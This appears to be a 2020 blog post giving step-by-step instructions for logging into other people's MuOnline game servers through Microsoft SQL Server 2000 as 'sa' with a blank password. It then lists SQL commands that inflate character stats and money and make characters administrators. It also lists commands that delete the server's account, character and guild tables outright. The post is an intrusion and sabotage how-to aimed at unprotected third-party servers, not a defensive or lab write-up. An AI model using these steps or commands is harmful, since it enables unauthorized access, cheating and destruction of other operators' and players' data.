Thursday, January 16, 2020

Fun with MSSQL

I will describe here the method of entry to the server.
Of course, the one who creates the server must be a complete idiot this to work but you can always try ^ _ ^ (like the blasts)
No, it will not work on XP, Zhyper, Grudge or any other known server ..
Requirements:
Microsoft SQL Server 2000
2 We need to know the IP server (it's obvious)
3 The server must have enabled SQL and Windows Authentication

Instructions:

1 First we need to install Microsoft SQL Server. Here is a description of how to do it
(Select "SQL Server 2000 Components"
1 "Install Database Server"
2 Next
3 Local Computer (mark)
4 Next
5 "Create a new instance of SQL Server, or install Client Tools" (mark)
6 Next
7 Some name, some sort of company and Next
8 Yes
9 Server and Client Tools (mark)
10 Next
11 select Default
12 Next
13 Typical (mark)
14 Next
14 "Use the same account for each service.Auto start the SQL Server Service" (mark)
15 "Use the Local System account" (mark)
16 Next
17 "Windows Authenticatication Mode." (Mark)
18 Next
19 Next
20 Install)


2 Are you in the Start> All Programs> Microsoft SQL Server> Query Analyzer

3 This should appear window

4
-In the SQL Server type: server IP
-In the Login Name, enter the sa
-Pole Password leave blank
-Do not select the Start SQL Server if it is stopped because the server is turned off!

5 Press OK, and if the server was not protected it merged

6 Now select MuOnline Database and we can start fun Enter one of these commands and press F5
Update Character set Level = VAULE where name = 'NAME' --- Change level

Update Character set Experience = VAULE where name = 'NAME' --- Add exp

Update Character set Dexterity = VAULE where name = 'NAME' --- Set Agility to 32500

Update Character set Strength = VAULE where name = 'NAME' --- Set Strenght to 32500

Update Character set Energy = VAULE where name = 'NAME' --- Set Energy to 32500

Update Character set Vitality = VAULE where name = 'NAME' --- Set Vitality to 32500

Update Character set Money = VAULE where name = 'NAME' --- Add zen in inventory(dont add more than 2kkk)

UPDATE character set CtlCode = 8 where name = 'NAME' --- Make all char admins

DELETE MEMB_INFO --- Delete server DB

DELETE Character --- Delete all chars

DELETE Guild --- Delete all Guilds
Where instead VALUE give some value, and instead name Character Name

No comments:

Post a Comment